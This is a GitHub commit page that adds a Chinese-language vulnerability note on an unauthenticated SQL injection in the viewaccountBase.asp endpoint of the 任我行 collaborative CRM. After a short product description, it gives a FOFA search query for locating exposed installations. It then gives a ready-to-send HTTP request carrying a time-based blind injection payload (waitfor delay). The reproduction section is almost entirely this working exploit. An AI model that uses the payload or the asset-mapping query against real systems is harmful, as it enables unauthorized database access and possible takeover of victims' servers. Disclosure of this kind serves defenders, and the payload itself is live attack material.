Update 任我行协同CRM普及版viewaccountBase存在SQL注入漏洞.md

This commit is contained in:
Rainyseason 2025-04-21 10:32:57 +08:00 committed by GitHub
parent 6de1e02296
commit 2332571a84
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -1 +1,22 @@
v # 任我行协同CRM普及版viewaccountBase存在SQL注入漏洞
# 一、漏洞简介
任我行CRM是CRM客户关系管理、OA自动化办公、OM目标管理、KM知识管理、HR人力资源一体化的企业管理软件。通过建立组织运营管理铁三角目标行动-企业文化-知识复制),一切围绕以客户为中心的全方位、透明化业务管理(市场-销售-生产-服务打造企业组织高效协同的运营管理平台。任我行协同CRM存在SQL注入漏洞远程未授权攻击者可利用此漏洞获取敏感信息进一步利用可能获取目标系统权限。
# 二、影响版本
+ 任我行协同CRM
# 三、资产测绘
```
fofa:app="任我行软件-管家婆分销ERP"
```
# 四、漏洞复现
```plain
GET /common/viewaccountBase.asp?TimeCheckPoint=80685.73&billnumberid=-1%20waitfor%20delay%20%270:0:8%27--&billtype= HTTP/2
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
```